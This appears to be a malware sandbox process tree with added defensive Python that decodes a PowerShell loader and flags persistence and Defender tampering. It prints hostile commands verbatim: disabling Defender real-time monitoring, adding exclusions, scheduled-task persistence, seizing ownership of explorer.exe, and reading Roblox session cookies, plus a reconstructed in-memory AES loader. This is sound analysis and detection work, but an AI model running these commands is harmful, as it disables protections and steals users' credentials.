        [7] C:\Users\Admin\Documents\piratemamm\ay85_ULmv5PUz0wHhxMnCWJ9.exe  |  C:\Users\Admin\Documents\piratemamm\ay85_ULmv5PUz0wHhxMnCWJ9.exe  |  PID 1656
          [8] C:\Windows\SysWOW64\schtasks.exe  |  schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST  |  PID 6580
              - Scheduled Task/Job: Scheduled Task
          [8] C:\Windows\SysWOW64\schtasks.exe  |  schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST  |  PID 5672
              - Scheduled Task/Job: Scheduled Task
        [7] C:\Users\Admin\Documents\piratemamm\rLSBhs5J_p58rPUv05JbI0OF.exe  |  C:\Users\Admin\Documents\piratemamm\rLSBhs5J_p58rPUv05JbI0OF.exe  |  PID 1508
          [8] C:\Windows\SysWOW64\cmd.exe  |  "C:\Windows\System32\cmd.exe" /k move Belly Belly.cmd & Belly.cmd & exit  |  PID 7464
        [7] C:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exe  |  C:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exe  |  PID 7432
          [8] C:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exe  |  C:\Users\Admin\Documents\piratemamm\OVZjIOTMJQq8t9HS33wYXDTt.exe  |  PID 8664
            [9] C:\Users\Admin\AppData\Local\Temp\calculator.exe  |  C:\Users\Admin\AppData\Local\Temp\calculator.exe  |  PID 8236
              [10] C:\Windows\SysWOW64\cmd.exe  |  "C:\Windows\System32\cmd.exe" /k move Florence Florence.cmd & Florence.cmd & exit  |  PID 4400
    [5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe  |  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"  |  PID 7544
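The powershell.exe child of the.exe above (PID 436) carries its whole script in a -EncodedCommand blob, which the report wraps across two lines. -EncodedCommand is base64 over UTF-16LE, not UTF-8; decoded, the blob sleeps 10 seconds, takes the newest file matching file-*.putik in %TEMP%, AES-CBC/PKCS7-decrypts it with a 32-byte key and 16-byte IV embedded as [byte[]]@(0x.., ...) literals, and runs the result with [System.Reflection.Assembly]::Load followed by EntryPoint.Invoke($null, $null). That is the in-memory loader behind the SetThreadContext flag and the jsc.exe children that follow. The Python below is an added example, not part of the sandbox report or of any tool it names: it decodes such a blob, pulls out the byte-array literals (key and IV candidates) and flags the loader pattern. SAMPLE_SCRIPT is constructed to mirror that structure; its variable names, key and IV are made up.

```python
"""Decode a PowerShell -EncodedCommand blob and triage it for the in-memory
.NET loader pattern (hard-coded AES key/IV, Assembly::Load, EntryPoint.Invoke).

Added example for this report; not part of the sandbox output or of any tool
it names. SAMPLE_SCRIPT is constructed: it mirrors the structure recovered
from the the.exe -> powershell.exe blob, but the names, key and IV are made up.
"""
import base64
import re

BYTE_ARRAY = re.compile(r"\[byte\[\]\]\s*@\(([^)]*)\)", re.I)
HEX_BYTE = re.compile(r"0x([0-9A-Fa-f]{1,2})")

# Each regex is one piece of the loader; the verdict needs the load + invoke pair.
LOADER_INDICATORS = {
    "sleep_delay": re.compile(r"\[System\.Threading\.Thread\]::Sleep\(\s*\d+\s*\)", re.I),
    "temp_search": re.compile(r"\[System\.IO\.Path\]::GetTempPath\(\)", re.I),
    "aes_cbc": re.compile(r"\[System\.Security\.Cryptography\.Aes\]::Create\(\)[\s\S]*?CipherMode\]::CBC", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I),
    "entrypoint_invoke": re.compile(r"\.EntryPoint\b[\s\S]{0,300}?\.Invoke\(", re.I),
}


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 of the script in UTF-16LE. Report viewers
    wrap the blob and some droppers omit base64 padding; normalise both."""
    compact = re.sub(r"\s+", "", blob)
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact).decode("utf-16-le")


def encode_command(script: str) -> str:
    """The inverse, used to build the constructed sample blob."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_byte_arrays(script: str):
    """(length, hex) for every [byte[]]@(0x.., ...) literal. Next to an Aes
    call, a 32/24/16-byte array is the key and a 16-byte array the IV."""
    out = []
    for m in BYTE_ARRAY.finditer(script):
        vals = [int(h, 16) for h in HEX_BYTE.findall(m.group(1))]
        if vals:  # skips [byte[]]@($variable)
            out.append((len(vals), bytes(vals).hex()))
    return out


def triage(script: str) -> dict:
    hits = {name: bool(rx.search(script)) for name, rx in LOADER_INDICATORS.items()}
    hits["byte_arrays"] = extract_byte_arrays(script)
    hits["verdict"] = ("in-memory .NET loader"
                       if hits["reflective_load"] and hits["entrypoint_invoke"]
                       else "review")
    return hits


def triage_blob(blob: str) -> dict:
    return triage(decode_encoded_command(blob))


# Constructed sample: same shape as the decoded blob, made-up key/IV/names.
SAMPLE_SCRIPT = r"""[System.Threading.Thread]::Sleep(10000)

$tmp = [System.IO.Path]::GetTempPath()
$pattern = 'file-*.putik'
$latest = Get-ChildItem -Path $tmp -Filter $pattern | Sort-Object LastWriteTime -Descending | Select-Object -First 1

function Decrypt-Blob {
    param([byte[]]$key, [byte[]]$iv, [byte[]]$data)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $dec = $aes.CreateDecryptor($key, $iv)
    return $dec.TransformFinalBlock($data, 0, $data.Length)
}

$key = [byte[]]@(0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F, 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F)
$iv  = [byte[]]@(0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7, 0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF)

if ($latest -ne $null) {
    $blob = [System.IO.File]::ReadAllBytes($latest.FullName)
    $plain = Decrypt-Blob -key $key -iv $iv -data $blob
    $asm = [System.Reflection.Assembly]::Load([byte[]]@($plain))
    $entry = $asm.EntryPoint
    $entry.Invoke($null, $null)
}
"""

if __name__ == "__main__":
    for k, v in triage_blob(encode_command(SAMPLE_SCRIPT)).items():
        print(f"{k}: {v}")
```

Paste the report's blob into triage_blob() to recover the real key and IV; with them and a copy of the dropped file-*.putik the staged assembly can be decrypted offline instead of being run.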
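Three behaviours in the tree above are worth turning into detections: the scheduled-task persistence (schtasks /create /sc ONLOGON /rl HIGHEST with task name "Windows 10 Boot" pointing at C:\Program Files\SubDir\Romilyaa.exe, re-created by every relaunch, plus the SYSTEM once-task for Install.exe); the restart batch under Romilyaa.exe (cmd /c <Temp>\<random>.bat, whose children are chcp 65001, ping -n 10 localhost and a fresh copy of the parent image); and the Defender tampering done through forfiles indirect execution (reg add to Windows Defender\Threats\ThreatIDDefaultAction with /d 6, where 6 is the documented Allow action, WMIC MSFT_MpPreference call Add ExclusionExtension=exe, and Add-MpPreference -ExclusionPath). The Python below is an added example, not from the report or any tool it names. RECORDS is a constructed subset of the tree: PIDs, images and command lines are copied from it and parent PIDs follow its nesting; the rule names are my own.

```python
"""Triage process records from a sandbox tree for scheduled-task persistence,
restart-batch loops and Defender tampering hidden behind forfiles.

Added example for this report, not part of the sandbox output. RECORDS is a
constructed subset of the tree: PIDs, images and command lines are copied
from it, parent PIDs follow its nesting. Rule names are mine; the numeric
ThreatIDDefaultAction meanings are the documented Defender policy values.
"""
import re
from collections import defaultdict

RECORDS = [
    # (pid, parent pid, image, command line)
    (6724, 0, r"C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\scary.exe", "scary.exe"),
    (6940, 6724, r"C:\Windows\SYSTEM32\schtasks.exe",
     r'"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f'),
    (7000, 6724, r"C:\Program Files\SubDir\Romilyaa.exe", r'"C:\Program Files\SubDir\Romilyaa.exe"'),
    (7136, 7000, r"C:\Windows\system32\cmd.exe",
     r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pc8glp8LK1ff.bat" "'),
    (1928, 7136, r"C:\Windows\system32\chcp.com", "chcp 65001"),
    (6212, 7136, r"C:\Windows\system32\PING.EXE", "ping -n 10 localhost"),
    (6508, 7136, r"C:\Program Files\SubDir\Romilyaa.exe", r'"C:\Program Files\SubDir\Romilyaa.exe"'),
    (8276, 6488, r"C:\Windows\SysWOW64\forfiles.exe",
     r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"'),
    (6100, 7052, r"C:\Windows\SysWOW64\Wbem\WMIC.exe",
     r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True'),
    (7468, 436, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exe" -Force'),
    (6768, 4580, r"C:\Windows\SysWOW64\schtasks.exe",
     r'schtasks /CREATE /TN "bUrgtLorVQntIbrvYS" /SC once /ST 19:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSE233.tmp\Install.exe\" Xi /DZldidho 525403 /S" /V1 /F'),
]

QUOTED_OR_WORD = r'"(?:[^"\\]|\\.)*"|\S+'          # handles \" escapes inside quotes
SCHTASKS_OPT = re.compile(r'/(tn|tr|sc|rl|ru|st)\s+(' + QUOTED_OR_WORD + r')', re.I)
FORFILES_INNER = re.compile(r'/c\s+"((?:[^"\\]|\\.)*)"', re.I)
THREAT_ACTION = re.compile(r'ThreatIDDefaultAction.*?/v\s+(\d+).*?/d\s+(\d+)', re.I)
MP_CMDLET = re.compile(r'Add-MpPreference\s+-Exclusion(Path|Extension|Process)\s+(' + QUOTED_OR_WORD + r')', re.I)
MP_WMI = re.compile(r'MSFT_MpPreference\s+call\s+Add\s+Exclusion(Path|Extension|Process)=(\S+)', re.I)
TEMP_BAT = re.compile(r'\\Temp\\[^"\\]+\.bat\b', re.I)

DEFENDER_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                    "8": "UserDefined", "9": "NoAction", "10": "Block"}
RISKY_SCHEDULES = {"ONLOGON", "ONSTART", "MINUTE", "HOURLY"}


def _unquote(v):
    if len(v) >= 2 and v[0] == '"' and v[-1] == '"':
        v = v[1:-1]
    return v.replace('\\"', '"')


def parse_schtasks(cmd):
    return {k.lower(): _unquote(v) for k, v in SCHTASKS_OPT.findall(cmd)}


def unwrap_indirect(cmd):
    """forfiles runs its /c string through cmd; return the inner command."""
    if not re.search(r'\bforfiles(?:\.exe)?\b', cmd, re.I):
        return None
    m = FORFILES_INNER.search(cmd)
    if not m:
        return None
    inner = m.group(1).replace('\\"', '"')
    return re.sub(r'^cmd(?:\.exe)?\s+/c\s+', '', inner, flags=re.I)


def match_rules(cmd):
    out = []
    if re.search(r'\bschtasks(?:\.exe)?\b', cmd, re.I) and re.search(r'/create\b', cmd, re.I):
        o = parse_schtasks(cmd)
        risky = o.get("sc", "").upper() in RISKY_SCHEDULES or o.get("ru", "").upper() == "SYSTEM"
        if risky or o.get("rl", "").upper() == "HIGHEST":
            out.append(("scheduled_task_persistence", o))
    m = THREAT_ACTION.search(cmd)
    if m:
        out.append(("defender_threat_default_action",
                    {"threat_id": m.group(1), "action": DEFENDER_ACTIONS.get(m.group(2), m.group(2))}))
    m = MP_CMDLET.search(cmd)
    if m:
        out.append(("defender_exclusion", {"kind": m.group(1), "value": _unquote(m.group(2))}))
    m = MP_WMI.search(cmd)
    if m:
        out.append(("defender_exclusion", {"kind": m.group(1), "value": m.group(2)}))
    return out


def find_restart_loops(records):
    """cmd.exe running a Temp .bat whose children are chcp, ping localhost and
    a relaunch of the cmd's own parent image: the Quasar-style restart batch."""
    by_pid = {r[0]: r for r in records}
    children = defaultdict(list)
    for pid, ppid, _, _ in records:
        children[ppid].append(pid)
    hits = []
    for pid, ppid, image, cmd in records:
        if not image.lower().endswith("cmd.exe") or not TEMP_BAT.search(cmd):
            continue
        kids = [by_pid[c] for c in children[pid]]
        has_chcp = any(k[2].lower().endswith("chcp.com") for k in kids)
        has_ping = any(k[2].lower().endswith("ping.exe") and "localhost" in k[3].lower() for k in kids)
        parent_image = by_pid[ppid][2].lower() if ppid in by_pid else ""
        relaunch = [k for k in kids if k[2].lower() == parent_image]
        if has_chcp and has_ping and relaunch:
            hits.append({"bat_cmd_pid": pid, "relaunched": relaunch[0][0], "image": parent_image})
    return hits


def triage(records):
    """Returns (pid, rule, detail) tuples; forfiles wrappers are unwrapped first."""
    findings = []
    for pid, _, _, cmd in records:
        inner = unwrap_indirect(cmd)
        if inner is not None:
            findings.append((pid, "indirect_execution", {"via": "forfiles", "inner": inner}))
        for rule, detail in match_rules(inner if inner is not None else cmd):
            findings.append((pid, rule, detail))
    for loop in find_restart_loops(records):
        findings.append((loop["bat_cmd_pid"], "restart_batch_loop", loop))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in triage(RECORDS):
        print(f"PID {pid}: {rule} {detail}")
```

The unwrap step matters: a rule that only looks at forfiles.exe sees a LOLBin, while the reg add that actually sets the threat action to Allow shows up only in the nested cmd.exe. Applying the rules to the recovered inner command ties both to the parent PID.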
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6756
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\wimloader.dllwimloader.dll3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6820
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_ab0ad3c8-8e5f-4ef7-ae0b-29dfec539936\caller.cmd" "4⤵
- System Location Discovery: System Language Discovery
PID:6872
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\ac3.exeac3.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:6196
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\shell1.ps1"3⤵PID:6316
C:\Windows\SysWOW64\PING.EXEping trustsentry.com -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6352
C:\Windows\SysWOW64\PING.EXEping ya.ru -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6412
C:\Windows\SysWOW64\PING.EXEping tria.ge -t -n 1 -s 4 -43⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6200
C:\Windows\SysWOW64\xcopy.exexcopy bloatware C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7128
C:\Windows\SysWOW64\xcopy.exexcopy beastify.url C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:8032
C:\Windows\SysWOW64\xcopy.exexcopy shell1.ps1 C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7488
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\explorer.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6628
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6556
C:\Windows\SysWOW64\takeown.exetakeown /R /F C:\Windows\System32\dwm.exe3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6244
C:\Windows\SysWOW64\icacls.exeicacls c:\Windows\System32\dwm.exe /grant Admin:(F)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:7384
C:\Windows\SysWOW64\xcopy.exexcopy xcer.cer C:\Users\Admin\Desktop3⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:7448
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7612
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7460
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\freebobux.exefreebobux.exe3⤵PID:6244
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9FEF.tmp\freebobux.bat""4⤵PID:5340
C:\Users\Admin\AppData\Local\Temp\9FEF.tmp\CLWCP.execlwcp c:\temp\bg.bmp5⤵PID:6664
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9FEF.tmp\x.vbs"5⤵PID:8952
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\SolaraBootstraper.exeSolaraBootstraper.exe3⤵PID:7380
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"4⤵PID:7452
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"4⤵PID:5388
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:6488
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"5⤵
- Views/modifies file attributes
PID:5284
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'5⤵
- Command and Scripting Interpreter: PowerShell
PID:8348
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 25⤵
- Command and Scripting Interpreter: PowerShell
PID:9116
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
PID:4628
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:8984
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption5⤵PID:2024
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory5⤵PID:8544
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid5⤵PID:8672
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Command and Scripting Interpreter: PowerShell
PID:8604
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- Detects videocard installed
PID:3564
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:8996
C:\Windows\system32\PING.EXEping localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9148
C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"4⤵PID:4412
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:8564
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im ctfmon.exe3⤵
- Kills process with taskkill
PID:6748
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\wim.dllwim.dll3⤵PID:5568
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wim_54feb21e-33bc-430a-b317-c9e501f91498\load.cmd" "4⤵PID:5572
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_54feb21e-33bc-430a-b317-c9e501f91498\cringe.mp4"5⤵PID:4064
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_54feb21e-33bc-430a-b317-c9e501f91498\lol.ini5⤵PID:4848
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\web2.htm3⤵PID:9152
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947184⤵PID:9184
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\xcer.cer3⤵PID:3452
C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\f3cb220f1aaa32ca310586e5f62dcab1.exef3cb220f1aaa32ca310586e5f62dcab1.exe3⤵PID:8780
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/account4⤵PID:9092
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947185⤵PID:2384
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/video4⤵PID:4860
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x110,0x114,0x118,0xec,0x11c,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947185⤵PID:5520
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/4⤵PID:8700
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe305946f8,0x7ffe30594708,0x7ffe305947185⤵PID:9144
C:\Windows\SysWOW64\timeout.exetimeout /t 153⤵
- Delays execution with timeout.exe
PID:7532
C:\Windows\SysWOW64\xcopy.exexcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop3⤵PID:8532
C:\Windows\SysWOW64\regedit.exeregedit3⤵
- Runs regedit.exe
PID:8456
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5248
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5640
C:\Windows\system32\efsui.exeefsui.exe /efs /keybackup1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5692
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4588 -ip 45881⤵PID:5816
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\4db139e92a77457a884aa834723d8dd9 /t 6048 /p 26801⤵PID:6364
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵PID:3964
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3028
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {61824777-8a7f-4138-8d1a-41c1c8262b91} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" gpu3⤵PID:4192
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2264 -parentBuildID 20240401114208 -prefsHandle 2364 -prefMapHandle 2360 -prefsLen 25789 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {104cc488-1700-41e6-92d4-907aa1cb8c13} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" socket3⤵PID:6940
